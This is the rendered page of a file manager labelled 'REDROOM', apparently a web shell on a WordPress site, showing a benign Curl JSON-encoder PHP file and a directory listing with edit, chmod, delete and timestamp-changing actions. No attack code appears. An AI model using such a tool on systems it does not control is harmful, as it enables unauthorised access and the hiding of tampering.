REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 681 B
Close
/home/nshryvcy/taramarriagebureau.com/wp-content/plugins/backuply/lib/Curl/Encoder.php
Text
Base64
<?php namespace Curl; class Encoder { /** * Encode JSON * * Wrap json_encode() to throw error when the value being encoded fails. * * @access public * @param $value * @param $options * @param $depth * * @return string * @throws \ErrorException */ public static function encodeJson() { $args = func_get_args(); $value = call_user_func_array('json_encode', $args); if (json_last_error() !== JSON_ERROR_NONE) { $error_message = 'json_encode error: ' . json_last_error_msg(); throw new \ErrorException($error_message); } return $value; } }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 8
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
ArrayUtil.php
3.54 KB
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
CaseInsensitiveArray.php
5.55 KB
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Curl.php
49.86 KB
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Decoder.php
897 B
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Encoder.php
681 B
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
MultiCurl.php
29.41 KB
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
StringUtil.php
1.63 KB
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Url.php
11.39 KB
lrw-r--r--
2025-04-30 03:18:11
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).